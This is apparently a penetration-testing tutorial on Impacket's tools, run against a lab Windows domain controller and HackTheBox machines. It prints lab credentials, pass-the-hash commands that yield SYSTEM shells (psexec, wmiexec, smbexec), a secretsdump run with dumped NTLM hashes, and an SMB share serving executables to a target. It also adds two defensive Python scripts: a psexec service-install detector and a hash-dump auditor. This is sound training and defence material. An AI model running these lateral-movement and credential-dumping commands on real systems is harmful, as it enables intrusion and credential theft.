Impacket

Impacket is a collection of Python classes for working with network protocols. It focuses on providing low-level programmatic access to packets and, for some protocols (e.g. SMB1-3 and MSRPC), to the protocol implementation itself. According to the Core Security website, Impacket supports protocols such as IP, TCP, UDP, ICMP, IGMP, ARP, IPv4, IPv6, SMB, MSRPC, NTLM, Kerberos, WMI and LDAP.

For the following practical we will require two systems:

  1. A Windows Server configured as a Domain Controller
  2. A Kali Linux machine

Here, in our lab scenario, we have configured the following settings on our systems.

Windows Server Details

  • Domain: SERVER
  • User: Administrator
  • Password: T00r
  • IP Address: 192.168.1.140

Kali Linux: 192.168.1.135

Before beginning with the Impacket tools, let's do an Nmap version scan on the target Windows server to get information about the services it is running.

nmap -sV 192.168.1.140

As you can see in the scan output, we have domain services, Kerberos services, NetBIOS services, LDAP services and Windows RPC services.

Now let’s install the Impacket tools from GitHub. You can get it from here.

First, clone the repository, and then install Impacket as shown below.

git clone https://github.com/CoreSecurity/impacket.git

cd impacket/

python setup.py install

This will install Impacket on your Kali Linux. After installation, let's look at the different tools Impacket ships with.

cd impacket/examples

These are some of the tools included in Impacket; let's try some of them.

Ping.py

Simple ICMP ping that uses the ICMP echo and echo-reply packets to check the status of a host. If the remote host is up, it should reply to the echo probe with an echo-reply packet.

./ping.py

Syntax: ./ping.py [Source IP] [Destination IP]

./ping.py 192.168.1.135 192.168.1.140

Lookupsid.py

A Windows SID bruteforcer example through [MS-LSAT] MSRPC Interface, aiming at finding remote users/groups.

./lookupsid.py

Syntax: ./lookupsid.py [[domain/] username [: password] @] [Target IP Address]

./lookupsid.py SERVER/Administrator:T00r@192.168.1.140

As you can see, lookupsid has extracted the user and group information from the server.

Psexec.py

It lets you execute processes on remote windows systems, copy files on remote systems, process their output and stream it back. It allows execution of remote shell commands directly with full interactive console without having to install any client software.

./psexec.py

root@kali:~/htb/silo# python psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 administrator@10.10.10.82
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

[*] Requesting shares on 10.10.10.82.....
[*] Found writable share ADMIN$
[*] Uploading file JbNIPTbN.exe
[*] Opening SVCManager on 10.10.10.82.....
[*] Creating service cKNz on 10.10.10.82.....
[*] Starting service cKNz.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

Syntax: ./psexec.py [[domain/] username [: password] @] [Target IP Address]

./psexec.py SERVER/Administrator:T00r@192.168.1.140

As you can see in the given screenshot, we got a remote shell on the server. Note: if the last character of the password is "!", bash history expansion breaks the command with an error such as "bash: !@192.168.178.200: event not found"; putting the credential argument in single quotes avoids this.
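Detection view of the run above, as an added example that is not part of the original page: the transcript shows psexec.py uploading a randomly named executable to ADMIN$ (C:\Windows) and registering a short randomly named service, which a Windows host records as a service-install event (Event ID 7045) in the System log. The key=value records below are constructed stand-ins for such events, and the name-pattern heuristic is derived only from this transcript, so it needs tuning before production use.

```python
import re

# Constructed sample records in the style of System log event 7045 ("A service was
# installed in the system"). The first mirrors the psexec.py run above: 4-letter
# service name, 8-letter executable dropped into the Windows root via ADMIN$.
SAMPLE_EVENTS = [
    r'EventID=7045 ServiceName=cKNz ImagePath=%SystemRoot%\JbNIPTbN.exe StartType=demand',
    r'EventID=7045 ServiceName=Sysmon64 ImagePath=C:\Windows\Sysmon64.exe StartType=auto',
    r'EventID=7045 ServiceName=WinDefend ImagePath="C:\ProgramData\Microsoft\Windows Defender\platform\MsMpEng.exe" StartType=auto',
    r'EventID=7036 ServiceName=cKNz State=running',
]

def parse_event(line):
    """Split a key=value record into a dict; quoted values may contain spaces."""
    return {k: v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|\S+)', line)}

# Heuristics taken from the transcript: all-letter 4-character service name,
# all-letter 8-character binary name, binary placed directly in the Windows root.
RANDOM_SVC = re.compile(r'^[A-Za-z]{4}$')
RANDOM_EXE = re.compile(r'^[A-Za-z]{8}\.exe$')
WINDOWS_ROOT = re.compile(r'^(%systemroot%|c:\\windows)\\[^\\]+$', re.IGNORECASE)

def looks_like_psexec_service(event):
    """True for a 7045 service-install record that matches the psexec.py pattern."""
    if event.get("EventID") != "7045":
        return False
    name = event.get("ServiceName", "")
    path = event.get("ImagePath", "")
    exe = path.rsplit("\\", 1)[-1]
    return bool(RANDOM_SVC.match(name) and WINDOWS_ROOT.match(path) and RANDOM_EXE.match(exe))

def flag_events(lines):
    """Return the service names of all records matching the pattern."""
    return [e["ServiceName"] for e in map(parse_event, lines) if looks_like_psexec_service(e)]

if __name__ == "__main__":
    print(flag_events(SAMPLE_EVENTS))
```

Pair a hit with the preceding SMB write of the same executable to ADMIN$ (file share access auditing) to raise confidence before alerting.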

Rpcdump.py

This script will dump the list of RPC endpoints and string bindings registered at the target. It will also try to match them with a list of well-known endpoints.

./rpcdump.py

Syntax: ./rpcdump.py [[domain/] username [: password] @] [Target IP Address]

./rpcdump.py SERVER/Administrator:T00r@192.168.1.140

As you can see below, we have the list of RPC endpoints registered on the target.

Samrdump.py

An application that communicates with the Security Account Manager Remote interface from the MSRPC suite. It lists system user accounts, available resource shares and other sensitive information exported through this service.

./samrdump.py

Syntax: ./samrdump.py [[domain/] username [: password] @] [Target IP Address]

./samrdump.py SERVER/Administrator:T00r@192.168.1.140

As you can see below, we have extracted SAM information from the target server.

Secretsdump.py

root@kali:~/htb/hercules# python secretsdump.py -just-dc-ntlm HTB.LOCAL/puckie@192.168.178.24
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:296ec447eee58283143efbd5d39408c8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
amanda:1104:aad3b435b51404eeaad3b435b51404ee:7d0516ea4b6ed084f3fdf71c47d9beb3:::
puckie:1603:aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef:::
[*] Cleaning up...
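The dump above is exactly what a defender should audit after an assessment. The following script, added here and not part of the original page, parses secretsdump's user:rid:lmhash:nthash::: lines and flags empty passwords (the well-known empty NT hash 31d6cfe0d16ae931b73c59d7e0c089c0 seen on Guest and DefaultAccount above), stored LM hashes and password reuse; the sample input reuses the six lines above plus one constructed account, svc_backup.

```python
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty password (LM disabled)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password

# Constructed sample: the six lines from the output above plus one made-up
# service account (svc_backup) that reuses amanda's password.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:296ec447eee58283143efbd5d39408c8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
amanda:1104:aad3b435b51404eeaad3b435b51404ee:7d0516ea4b6ed084f3fdf71c47d9beb3:::
puckie:1603:aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef:::
svc_backup:1700:aad3b435b51404eeaad3b435b51404ee:7d0516ea4b6ed084f3fdf71c47d9beb3:::
"""

# One credential line: [domain\]user:rid:lmhash:nthash:::
LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)

def parse_dump(text):
    """Return one dict per credential line; status lines such as '[*] ...' are skipped."""
    accounts = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            accounts.append(dict(m.groupdict(), rid=int(m.group("rid"))))
    return accounts

def audit(accounts):
    """Hygiene findings a defender would act on: empty passwords, LM hashes, reuse."""
    findings = []
    by_nt = defaultdict(list)
    for a in accounts:
        if a["nt"] == EMPTY_NT:
            findings.append((a["user"], "empty password"))
        if a["lm"] != EMPTY_LM:
            findings.append((a["user"], "LM hash stored"))
        by_nt[a["nt"]].append(a["user"])
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            findings.append((",".join(users), "shared password"))
    return findings

if __name__ == "__main__":
    for who, kind in audit(parse_dump(SAMPLE_DUMP)):
        print(f"{kind:16} {who}")
```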

SMBexec.py

It generates a semi-interactive shell. It does not require installing any service or agent on the target server. It is stealthy and runs as Administrator.

./smbexec.py

E:\OSCP>smbexec -hashes 566EFC084E3FCCB7B4DF6D823C906E54:566EFC084E3FCCB7B4DF6D823C906E54 administrator@192.168.178.24
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system

SMBserver.py

root@kali:~/htb/dropzone/share# impacket-smbserver share ./
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed

c:\windows\system32>\\10.10.14.19\share\whoami.exe
\\10.10.14.19\share\whoami.exe
NT AUTHORITY\SYSTEM
c:\windows\system32>copy \\10.10.14.19\share\whoami.exe
copy \\10.10.14.19\share\whoami.exe
1 file(s) copied.


KALI htb/tally# impacket-smbserver share ./ -smb2support
LT-JACCO Group Policy Editor: Enable insecure guest logons

Since the "Windows 10 Fall Creators Update", guest access over SMB2 is disabled by default on the client. You can change this setting in the local Group Policy Editor:

  1. In the Run box, type "gpedit.msc".
  2. In the local Group Policy Editor, go to Computer Configuration\Administrative Templates\Network\Lanman Workstation.
  3. Open "Enable insecure guest logons", set it to Enabled and select OK.

Sniff.py

Simple packet sniffer that uses the pcapy library to listen for packets in transit over the specified interface.

./sniff.py

Choose the interface using the number associated with it, and the sniffing starts.

Sniffer.py

Simple packet sniffer that uses a raw socket to listen for packets in transit corresponding to the specified protocols.

./sniffer.py

The sniffer then starts to monitor ICMP, TCP and UDP traffic.

Wmiexec.py

It generates a semi-interactive shell, used through Windows Management Instrumentation. It does not require to install any service/agent at the target server. It runs as Administrator. It is highly stealthy.

./wmiexec.py

root@kali:~/htb/silo# python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 administrator@10.10.10.82
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
silo\administrator

Syntax: ./wmiexec.py [[domain/] username [: password] @] [Target IP Address]

./wmiexec.py SERVER/Administrator:T00r@192.168.1.140

As you can see below, we have a shell on the target server.

Wmiquery.py

It allows you to issue WQL queries and get descriptions of WMI objects on the target system.

./wmiquery.py

Syntax: ./wmiquery.py [[domain/] username [: password] @] [Target IP Address]

./wmiquery.py SERVER/Administrator:T00r@192.168.1.140

This will open a shell where you can run WQL queries such as:

SELECT * FROM Win32_LogicalDisk WHERE FreeSpace < 209152

Atexec.py

This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.

./atexec.py

Syntax: ./atexec.py [[domain/] username [: password] @] [Target IP Address] [Command]

./atexec.py SERVER/Administrator:T00r@192.168.1.140 systeminfo

As you can see below, a remote connection was established to the server and the command systeminfo was run on the target server, with the output of the command delivered to the Kali terminal.

getArch.py

This script will connect to a target machine (or a list of targets) and gather the installed OS architecture type by (ab)using a documented MSRPC feature.

./getArch.py

Syntax: ./getArch.py -target [IP Address]

Command: ./getArch.py -target 192.168.1.140

Here we can see that the architecture of the target system is 64-bit.

Ifmap.py

This script will bind to the target's MGMT interface to get a list of interface IDs. It checks that list against another list of known interface UUIDs and reports whether each interface is listed and/or listening.

Syntax: ./ifmap.py [Host IP Address] [Port]

./ifmap.py 192.168.1.140 135

./ifmap.py 192.168.1.140 49154

mssqlclient.py

This script is a TDS (MS-SQL) client with SSL support: it connects to a target MS-SQL server and gives you an interactive SQL shell, as the usage text below shows.

root@kali:~/htb/# python mssqlclient.py 
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

usage: mssqlclient.py [-h] [-port PORT] [-db DB] [-windows-auth] [-debug]
[-file FILE] [-hashes LMHASH:NTHASH] [-no-pass] [-k]
[-aesKey hex key] [-dc-ip ip address]
target

TDS client implementation (SSL supported).

positional arguments:
target [[domain/]username[:password]@]<targetName or address>

optional arguments:
-h, --help show this help message and exit
-port PORT target MSSQL port (default 1433)
-db DB MSSQL database instance (default None)
-windows-auth whether or not to use Windows Authentication (default
False)
-debug Turn DEBUG output ON
-file FILE input file with commands to execute in the SQL shell

authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from
ccache file (KRB5CCNAME) based on target parameters.
If valid credentials cannot be found, it will use the
ones specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256
bits)
-dc-ip ip address IP Address of the domain controller. If ommited it use
the domain part (FQDN) specified in the target
parameter
Example: ./mssqlclient.py -windows-auth htb.local/mssql-svc@10.10.x.x

Author: Jacco Straathof